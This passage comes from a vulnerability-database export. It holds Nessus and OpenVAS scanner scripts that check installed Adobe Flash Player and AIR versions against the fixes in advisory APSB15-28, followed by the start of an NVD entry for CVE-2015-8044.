(APSB15-28)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 19.0.0.226. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 19.0.0.245 or later.\n\nAlternatively, Adobe has made version 18.0.0.261 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8046\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (version =~ \"^19\\.\")\n{\n cutoff_version = \"19.0.0.226\";\n fix = \"19.0.0.245\";\n}\nelse\n{\n cutoff_version = \"18.0.0.255\";\n fix = \"18.0.0.261\";\n}\n\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-19T22:13:42", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-11-13T00:00:00", "id": "OPENVAS:1361412562310806616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806616", "title": "Adobe Flash Player Multiple Vulnerabilities Nov15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities Nov15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806616\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\",\n \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\",\n \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\",\n \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\",\n \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-13 17:36:09 +0530 (Fri, 13 Nov 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion error.\n\n - Multiple use-after-free errors.\n\n - Another unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to bypass security restrictions and execute arbitrary code on the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 18.x before\n 18.0.0.261 and 19.x before 19.0.0.245 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.261 or 19.0.0.245 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"19.0.0.244\"))\n{\n fix = \"19.0.0.245\";\n VULN = TRUE;\n}\n\nelse if(version_in_range(version:playerVer, test_version:\"18.0\", test_version2:\"18.0.0.260\"))\n{\n fix = \"18.0.0.261\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version:' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-11-13T00:00:00", "id": "OPENVAS:1361412562310806620", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806620", "title": "Adobe Air Multiple Vulnerabilities Nov15 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln_nov15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities Nov15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806620\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\",\n \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\",\n \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\",\n \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\",\n \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-13 18:10:33 +0530 (Fri, 13 Nov 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities Nov15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion error.\n\n - Multiple use-after-free errors.\n\n - Another unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to bypass security restrictions and execute arbitrary code on the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before\n 19.0.0.241 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 19.0.0.241 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"19.0.0.241\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"19.0.0.241\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:41", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-11-13T00:00:00", "id": "OPENVAS:1361412562310806618", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806618", "title": "Adobe Flash Player Multiple Vulnerabilities Nov15 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities Nov15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806618\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\",\n \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\",\n \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\",\n \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\",\n \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-13 18:47:26 +0530 (Fri, 13 Nov 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion error.\n\n - Multiple use-after-free errors.\n\n - Another unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to bypass security restrictions and execute arbitrary code on the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version 11.2.202.548\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.548 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"11.0\", test_version2:\"11.2.202.547\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: 11.2.202.548 \\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:58", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-11-13T00:00:00", "id": "OPENVAS:1361412562310806619", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806619", "title": "Adobe Air Multiple Vulnerabilities Nov15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln_nov15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities Nov15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806619\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\",\n \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\",\n \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\",\n \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\",\n \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-13 18:40:09 +0530 (Fri, 13 Nov 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion error.\n\n - Multiple use-after-free errors.\n\n - Another unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to bypass security restrictions and execute arbitrary code on the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before\n 19.0.0.241 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 19.0.0.241 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"19.0.0.241\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"19.0.0.241\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-11-13T00:00:00", "id": "OPENVAS:1361412562310806617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806617", "title": "Adobe Flash Player Multiple Vulnerabilities Nov15 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities Nov15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806617\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\",\n \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\",\n \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\",\n \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\",\n \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-13 17:45:30 +0530 (Fri, 13 Nov 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities Nov15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion error.\n\n - Multiple use-after-free errors.\n\n - Another unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to bypass security restrictions and execute arbitrary code on the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 18.x before\n 18.0.0.261 and 19.x before 19.0.0.245 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.261 or 19.0.0.245 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"19.0.0.244\"))\n{\n fix = \"19.0.0.245\";\n VULN = TRUE;\n}\n\nelse if(version_in_range(version:playerVer, test_version:\"18.0\", test_version2:\"18.0.0.260\"))\n{\n fix = \"18.0.0.261\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version:' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2015-0444", "modified": "2018-09-28T00:00:00", "published": "2015-11-12T00:00:00", "id": "OPENVAS:1361412562310131130", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131130", "title": "Mageia Linux Local Check: mgasa-2015-0444", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0444.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131130\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-12 07:46:25 +0200 (Thu, 12 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0444\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.548 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves a type confusion vulnerability that could lead to code execution (CVE-2015-7659). This update resolves a security bypass vulnerability that could be exploited to write arbitrary data to the file system under user permissions (CVE-2015-7662). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044, CVE-2015-8046).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0444.html\");\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0444\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.548~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.261 and 19.x before 19.0.0.245 on Windows and OS X and before 11.2.202.548 on Linux, Adobe AIR before 19.0.0.241, Adobe AIR SDK before 19.0.0.241, and Adobe AIR SDK & Compiler before 19.0.0.241 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8043, and CVE-2015-8046.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "modified": "2017-07-01T01:29:00", "id": "CVE-2015-8044", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8044", "published": "2015-11-11T13:00:00", "title": "CVE-2015-8044", "type": "cve", 